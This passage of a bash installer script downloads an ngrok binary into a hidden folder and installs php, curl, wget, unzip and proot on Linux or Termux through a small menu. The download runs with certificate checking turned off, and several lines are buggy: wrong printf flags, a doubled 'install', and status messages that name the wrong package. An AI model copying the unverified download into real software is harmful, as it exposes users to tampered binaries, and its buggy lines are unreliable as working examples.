78 | arch=$(uname -a | grep -o 'arm' | head -n1) 79 | arch2=$(uname -a | grep -o 'Android' | head -n1) 80 | if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then 81 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1 82 | 83 | if [[ -e ngrok-stable-linux-arm.zip ]]; then 84 | unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1 85 | mv -f ngrok .ser/ngrok > /dev/null 2>&1 86 | chmod +x .ser/ngrok 87 | rm -rf ngrok-stable-linux-arm.zip 88 | else 89 | printf -e -n ${RED}"\n[!] Downloading error... Termux, run: pkg install wget And run the script again\n" 90 | exit 1 91 | fi 92 | else 93 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 94 | 95 | if [[ -e ngrok-stable-linux-386.zip ]]; then 96 | unzip ngrok-stable-linux-386.zip > /dev/null 2>&1 97 | mv -f ngrok .ser/ngrok > /dev/null 2>&1 98 | chmod +x .ser/ngrok 99 | rm -rf ngrok-stable-linux-386.zip 100 | else 101 | echo -e -n ${RED}"\n[!] Downloading error...........\n" 102 | exit 1 103 | fi 104 | 105 | fi 106 | fi 107 | } 108 | function ter_req(){ 109 | clear 110 | banner 111 | if [[ -d "/data/data/com.termux/files/home" ]]; then 112 | if [[ `command -v proot` ]]; then 113 | printf '' 114 | else 115 | echo -e -n ${CP}"\n[*]........Installing : ${ORANGE}proot..... \n" 116 | pkg install proot resolv-conf -y 117 | fi 118 | fi 119 | command -v "wget" >/dev/null 2>&1 120 | if [[ $? -ne 0 ]]; then 121 | pkg install wget -y 122 | echo -e -n ${ORANGE}"\n[ ✔ ].........unzip successfully installed...........\n" 123 | else 124 | echo -e -n ${NEW}"\n[ ✔ ]...........unzip already exists..................\n" 125 | fi 126 | command -v "php" >/dev/null 2>&1 127 | if [[ $? -ne 0 ]]; then 128 | pkg install php -y 129 | echo -e -n ${CG}"\n[ ✔ ].........curl successfully installed................\n" 130 | else 131 | echo -e -n ${YELLOW}"\n[ ✔ ]...........curl already exists...................\n" 132 | fi 133 | command -v "curl" >/dev/null 2>&1 134 | if [[ $? -ne 0 ]]; then 135 | pkg install install curl -y 136 | echo -e -n ${CP}"\n[ ✔ ].........php successfully installed................\n" 137 | else 138 | echo -e -n ${CN}"\n[ ✔ ]...........php already exists....................\n" 139 | fi 140 | command -v "unzip" >/dev/null 2>&1 141 | if [[ $? -ne 0 ]]; then 142 | pkg install unzip -y 143 | echo -e -n ${CP}"\n[ ✔ ].........wget successfully installed................\n" 144 | else 145 | echo -e -n ${CNC}"\n[ ✔ ]...........wget already exists...................\n" 146 | fi 147 | ngrok 148 | } 149 | menu() 150 | { 151 | clear 152 | banner 153 | echo -e ${YELLOW}"\n[*] Choose Installation: \n " 154 | echo -e " ${NC}[${PINK}"1"${NC}]${PINK} Linux Installation ${BLUE}(Linux Based OS)" 155 | echo -e " ${NC}[${NEW}"2"${NC}]${NEW} Termux Installation ${CP}(For Android)" 156 | echo -e " ${NC}[${CG}"3"${NC}]${CNC} Exit" 157 | 158 | echo -n -e ${YELLOW}"\n[+] Select: " 159 | read redi_play 160 | if [ $redi_play -eq 1 ]; then 161 | req 162 | elif [ $redi_play -eq 2 ]; then 163 | ter_req 164 | elif [ $redi_play -eq 3 ]; then 165 | exit 166 | else 167 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 168 | sleep 1 169 | menu 170 | fi 171 | } 172 | menu 173 | 174 | --------------------------------------------------------------------------------